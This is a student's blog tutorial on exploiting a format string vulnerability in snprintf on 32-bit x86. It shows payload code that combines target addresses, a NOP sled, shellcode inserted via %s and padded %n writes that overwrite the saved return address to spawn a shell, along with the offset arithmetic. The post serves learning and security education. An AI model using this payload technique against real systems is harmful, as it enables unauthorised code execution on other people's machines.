Exploiting format string vulnerabilities

Saturday, 5 October, 2024 // software

Most people start off learning about executing untrusted code by exploiting buffer overflows, usually by using sprintf as an attack vector. The method is well documented¹ across the internet, and you’ll find plenty of well-intentioned advice recommending that developers use snprintf instead.

We know that snprintf is safe from buffer overflow attacks because it takes a size parameter and ensures that it never writes beyond the specified buffer size:

snprintf(buffer, sizeof buffer, arg);

If that’s the case, how then can we still exploit it? The key lies in unvalidated, untrusted user input being used as the format string. In this article, I document what I learned while attempting to exploit the snprintf function as part of an assignment in a Software Security module at NUS. I’ll only be sharing a general, high-level approach and assume you’re already familiar with using tools like GDB.
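To make the distinction concrete, here is a minimal sketch of the safe counterpart to the call above: the untrusted string is passed as an argument to a fixed "%s" format instead of being the format itself. The name copy_untrusted is my own, purely for illustration, and is not from the assignment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: copies untrusted input into dst without ever
 * letting it act as a format string. Returns the length snprintf
 * would have needed, so callers can detect truncation. */
int copy_untrusted(char *dst, size_t dst_size, const char *untrusted)
{
    assert(dst != NULL && untrusted != NULL && dst_size > 0);
    /* The format is a fixed literal, so any specifiers inside
     * `untrusted` are copied as plain characters, not interpreted. */
    return snprintf(dst, dst_size, "%s", untrusted);
}
```

Calling copy_untrusted(out, sizeof out, "%x%x%n") simply stores the six characters as text. The vulnerable form differs only in passing the input where the format belongs.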

Disclaimer: The information and techniques presented in this article are intended solely for educational purposes and legitimate security research. Format string vulnerabilities and their exploitation methods should only be tested in controlled environments such as personal lab setups, authorised penetration testing scenarios, or designated practice platforms. Attempting to exploit these vulnerabilities on systems without explicit written permission is illegal and unethical. Readers are strongly encouraged to use this knowledge responsibly to improve software security, conduct authorised security assessments, and develop more secure coding practices. The author assumes no responsibility for any misuse of the information provided or any damages resulting from unauthorised testing or malicious activities.

High-level approach

Our goal is to corrupt the saved return address (the saved EIP) on the stack so that execution is redirected into a NOP sled and on to our shellcode. The key to exploiting snprintf is every security engineer’s nightmare: undefined behaviour. In this case, it is the %n format specifier² reading a value off the stack and treating it as an address to write to when no matching argument is provided.

We then use the %x specifier with a field width to pad the number of characters written so far, which is the value %n stores, so that we can control precisely what lands in the saved return address. Repeat this four times and we overwrite the return address with four overlapping writes, each one a full 4-byte WORD (not a single byte!) starting one byte after the previous, such that it ultimately points to a location somewhere within the NOP sled, thereby executing our shellcode.
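If the interaction between a field width and %n is unfamiliar, the following sketch shows it in a well-formed call where every specifier has a matching argument. The function name is hypothetical, and I’m assuming a C library that still honours %n (some hardened ones disable it).

```c
#include <assert.h>
#include <stdio.h>

/* Illustration only: a well-formed call where %n has a matching int*
 * argument. Returns the count that %n stored after a width-padded %x. */
int count_after_padded_hex(unsigned value, int width)
{
    char scratch[512];
    int written = -1;

    assert(width >= 0 && width < (int)sizeof scratch);
    /* "%*x" pads the hex output to at least `width` characters;
     * %n then stores how many characters have been produced so far. */
    snprintf(scratch, sizeof scratch, "%*x%n", width, value, &written);
    return written;
}
```

With value 0x41414141, a width of 143 yields a count of 143, while a width of 4 yields 8 because the eight hex digits are never truncated. The exploit relies on the same counting, minus the matching arguments.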

The examples from here onwards assume the vulnerable target program runs in a 32-bit x86 (little-endian) system. It contains a line of code where untrusted input into snprintf is not validated. Ironically, we’ll also be using snprintf to construct our payload. With that, let’s get started.

Payload construction

Let’s say we’ve already obtained the location of the saved return address in the target program after sleuthing around in GDB, e.g. 0xffffdcec. The payload should then begin with this base address, written as little-endian bytes in a string literal, followed by 4 junk bytes (WORD-sized) for padding. I personally like using “AAAA” as it’s easily identifiable as 0x41414141 in hexadecimal representation.

Repeat this 3 more times while incrementing the address by 1 byte each time, and we get:

char payload[400];

snprintf(payload, 400,
  "\xec\xdc\xff\xff" // base address
  "AAAA"
  "\xed\xdc\xff\xff"
  "AAAA"
  "\xee\xdc\xff\xff"
  "AAAA"
  "\xef\xdc\xff\xff"
  "AAAA"
);

Let’s walk through this a little before we continue. The fact that they are all WORD-sized is important, because we’re anticipating how %n works when an argument is not supplied: it simply reads the next value off the stack and uses it as the location to write to. Each %x specifier, whose width we set in the format string, consumes an “AAAA” value from the stack as its argument, so that the next %n reads the following value as an address.
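The same 32-byte prefix can also be generated rather than typed by hand, which helps when the base address changes between runs. This is only a sketch under my own naming (build_prefix, SLOT_COUNT and PREFIX_LEN are hypothetical), assuming the 32-bit little-endian layout described earlier.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SLOT_COUNT 4
#define PREFIX_LEN (SLOT_COUNT * 8) /* 4-byte address + 4-byte filler */

/* Hypothetical helper: writes base, base+1, base+2, base+3 in
 * little-endian order, each followed by "AAAA", into out. */
void build_prefix(uint32_t base, unsigned char out[PREFIX_LEN])
{
    assert(out != NULL);
    for (uint32_t i = 0; i < SLOT_COUNT; i++) {
        uint32_t addr = base + i;
        unsigned char *slot = out + i * 8;
        slot[0] = (unsigned char)(addr & 0xff);         /* lowest byte first */
        slot[1] = (unsigned char)((addr >> 8) & 0xff);
        slot[2] = (unsigned char)((addr >> 16) & 0xff);
        slot[3] = (unsigned char)((addr >> 24) & 0xff);
        memcpy(slot + 4, "AAAA", 4);                    /* filler consumed by %x */
    }
}
```

For a base of 0xffffdcec this produces the same bytes as the string literals above, starting with ec dc ff ff followed by "AAAA".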

NOP sled

Next, we’ll insert a 256-byte NOP sled into the payload to make landing the attack easier. This part is crucial. Recall that our goal is to overwrite the saved return address on the stack so that it points at our shellcode.

However, because of address space layout variations, stack positions that shift with environment variables, and the general difficulty of calculating exact offsets, there’s no reliable way to land on the exact address of our shellcode. So instead of needing to redirect execution to a single address, a NOP sled lets us aim the return address anywhere within a range of addresses. Also, the wider the NOP sled, the simpler the pointer arithmetic required.

snprintf(payload, 400,
  "\xec\xdc\xff\xff" // base address
  "AAAA"
  "\xed\xdc\xff\xff"
  "AAAA"
  "\xee\xdc\xff\xff"
  "AAAA"
  "\xef\xdc\xff\xff"
  "AAAA"
  "\x90\x90\x90..." // repeat until 256 bytes in total
);
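Typing out 256 copies of \x90 is tedious, so the sled is easier to fill in with memset. The sketch below shows one way to do that. fill_nop_sled and the two macros are names I made up for illustration, not part of the original payload code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NOP_OPCODE 0x90 /* single-byte x86 NOP */
#define SLED_LEN   256

/* Hypothetical helper: fills SLED_LEN bytes starting at dst with NOPs
 * and returns a pointer just past the sled, where the next part of the
 * payload would go. */
unsigned char *fill_nop_sled(unsigned char *dst, size_t capacity)
{
    assert(dst != NULL && capacity >= SLED_LEN);
    memset(dst, NOP_OPCODE, SLED_LEN);
    return dst + SLED_LEN;
}
```

Returning the end pointer makes it simple to chain the next piece of the payload directly after the sled.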

Determining the target address

At this point, you’ll need to first figure out where your NOP sled sits in memory with some test payloads in GDB. That is why using “AAAA” as your padding value is a good idea. It’s a lot easier to spot repeating patterns that look “synthetic” in the sea of values when swimming in GDB.

Let’s assume we’ve done that, and determined that our NOP sled is between 0xffffdb74 and 0xffffdc64. This means our target address just needs to be somewhere between them. For the sake of our example, let’s just proceed with 0xffffdc4d.

Exploit mechanism

So if we all come together, we know what to do — Toy-Box

Finally, the bee’s knees. The cat’s meow. Crème de la crème. We’ve arrived at the main exploit mechanism. When we build the payload, the %s specifier copies our shellcode in right after the NOP sled. Those bytes also count towards the number of characters written before the first %n, which is what lines the count up with the addresses in the earlier part of the payload.

snprintf(payload, 400,
  "\xec\xdc\xff\xff" // base address
  "AAAA"
  "\xed\xdc\xff\xff"
  "AAAA"
  "\xee\xdc\xff\xff"
  "AAAA"
  "\xef\xdc\xff\xff"
  "AAAA"
  "\x90\x90\x90..." // repeat until 256 bytes in total
  "%s"
  "%%n"
  "%%143x%%n"
  "%%35x%%n"
  "%%256x%%n",
  shellcode
);

Note that this snprintf is not the actual vulnerable call we’re exploiting. I’m merely using snprintf to construct the payload, hence the need to escape the specifiers, i.e. "%%n".
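To see what the escaping does, here is a small sketch that renders one escaped fragment and nothing else. The helper name is hypothetical; the point is only that each "%%" collapses into a single literal '%' and consumes no argument.

```c
#include <assert.h>
#include <stdio.h>

/* Illustration only: renders an escaped format fragment so we can see
 * what ends up in the payload. Returns 1 if the output fit in dst. */
int render_escaped_specifiers(char *dst, size_t dst_size)
{
    assert(dst != NULL && dst_size > 0);
    /* Each "%%" becomes a single literal '%', so no argument is consumed. */
    int n = snprintf(dst, dst_size, "%%143x%%n");
    return n >= 0 && (size_t)n < dst_size;
}
```

After the call, dst holds the seven characters %143x%n, which is exactly what the vulnerable program will later interpret as live specifiers.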

Here’s where most of the magic begins to happen: the undefined behaviour I’ve been harping on about. By the time the parser reaches the first %n specifier, it will have written a total of 333 characters. You can calculate it yourself this way:

(4-byte address + 4-byte 'AAAA' padding) * 4 
+ 
256-byte NOP sled 
+ 
45-byte shellcode processed by %s specifier
=
333 chars

This causes the value 0x0000014d (the hexadecimal representation of 333) to be written at the location 0xffffdcec! Because we slotted in a %x specifier padded to 143 characters, the second %n will write 333 + 143 = 476 (0x000001dc) to the next address, 0xffffdced.
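The widths 143, 35 and 256 are not magic numbers. Each one is the gap, modulo 256, between the low byte of the running count and the next byte we want in the target address 0xffffdc4d. The first byte needs no padding because 333 is already 0x14d. Here is a sketch of that arithmetic, with a hypothetical helper name and the assumption that every %x prints the 8 digits of 0x41414141:

```c
#include <assert.h>
#include <stdint.h>

#define MIN_HEX_WIDTH 8u /* "%x" of 0x41414141 always prints 8 digits */

/* Hypothetical helper: given the number of characters written so far
 * and the byte we want the next %n to leave in place, returns the
 * field width to give the %x that precedes that %n. */
unsigned next_pad_width(unsigned written, uint8_t wanted_byte)
{
    /* Only the low byte of the count survives the overlapping writes,
     * so work modulo 256. */
    unsigned width = ((unsigned)wanted_byte - written) & 0xffu;

    /* A width below 8 cannot shorten the 8 digits %x prints, so go
     * around one more full cycle of 256 instead. */
    if (width < MIN_HEX_WIDTH)
        width += 256u;

    assert(((written + width) & 0xffu) == wanted_byte);
    return width;
}
```

Starting from 333, asking for 0xdc gives 143, then 0xff gives 35, and asking for 0xff again gives 256, since a gap of zero has to wrap all the way around.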

If we visualise the saved return address (saved EIP) on the stack for the whole operation:

# Our desired address (little-endian)
0xffffdcec: [  0x4d  ][  0xdc  ][  0xff  ][  0xff  ]

# First %n writes 333 or 0x0000014d at 0xffffdcec
0xffffdcec: [  0x4d  ][  0x01  ][  0x00  ][  0x00  ]
Result at return address: 0x0000014d

# Second %n writes (333 + 143) or 0x000001dc at 0xffffdced
0xffffdcec: [  0x4d  ][  0xdc  ][  0x01  ][  0x00  ]
Result at return address: 0x0001dc4d

# Third %n writes (333 + 143 + 35) or 0x000001ff at 0xffffdcee
0xffffdcec: [  0x4d  ][  0xdc  ][  0xff  ][  0x01  ]
Result at return address: 0x01ffdc4d

# Final %n writes (333 + 143 + 35 + 256) or 0x000002ff at 0xffffdcef
0xffffdcec: [  0x4d  ][  0xdc  ][  0xff  ][  0xff  ]
Result at return address: 0xffffdc4d

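This approach relies on an overlapping write pattern because %n always writes a full 4-byte integer, so the upper bytes of each count spill into the bytes that follow. Each subsequent write starts one byte later and overwrites the spill of the previous one. That is why, if you debug this method in GDB, you’ll see a stray leading ‘1’ after each of the first three writes; the final write leaves 0x02 0x00 0x00 in the three bytes just past the return address.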
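If you’d rather convince yourself without GDB, the four writes can be replayed on a plain byte array. This is a simulation sketch only; the function names are mine, and the 8-byte window stands in for the return address plus the bytes right after it.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simulates one %n on little-endian x86: stores `count` as a 4-byte
 * integer starting at mem[offset]. */
static void store_le32(unsigned char *mem, size_t offset, uint32_t count)
{
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (unsigned char)((count >> (8 * i)) & 0xff);
}

/* Hypothetical simulation: applies the four writes from the walkthrough
 * to a zeroed 8-byte window and returns the first 4 bytes read back as
 * a little-endian value. spill (3 bytes) receives what landed past it. */
uint32_t simulate_overlapping_writes(unsigned char spill[3])
{
    unsigned char mem[8] = {0};
    const uint32_t counts[4] = {333, 333 + 143, 333 + 143 + 35,
                                333 + 143 + 35 + 256};

    assert(spill != NULL);
    for (size_t i = 0; i < 4; i++)
        store_le32(mem, i, counts[i]); /* each write starts 1 byte later */

    memcpy(spill, mem + 4, 3);
    return (uint32_t)mem[0] | ((uint32_t)mem[1] << 8) |
           ((uint32_t)mem[2] << 16) | ((uint32_t)mem[3] << 24);
}
```

The function returns 0xffffdc4d, and the spill bytes come back as 02 00 00, which matches the final row of the diagram plus the leftover from the last write.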

Game over

Once the return address is overwritten, we’ve accomplished our mission. The 45-byte shellcode I used comes from the Linux/x86 exec(’/bin/dash’) entry on exploit-db, which does not contain any null bytes and gives you an interactive shell. If you use a different shellcode and still insert it with %s, make sure it contains no null bytes either, because %s stops copying at the first one!
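A quick way to check a candidate shellcode for null bytes before handing it to %s is a memchr scan. The helper below is a sketch with a made-up name.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns 1 if any byte in buf[0..len) is 0x00.
 * Such a byte would make %s stop copying early. */
int contains_null_byte(const unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    return memchr(buf, 0x00, len) != NULL;
}
```

Pass the explicit length of the shellcode rather than relying on strlen, since strlen would itself stop at the first null byte and hide the problem.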

This exercise was probably one of my favourite assignments, coming right after the problems in Data Structures & Algorithms. It tested my understanding of buffer overflows, pointer arithmetic, memory layouts and how the stack works. I had a ton of fun solving it, so much so that I decided to write it down to enshrine what I learned. Hope this helps you as well.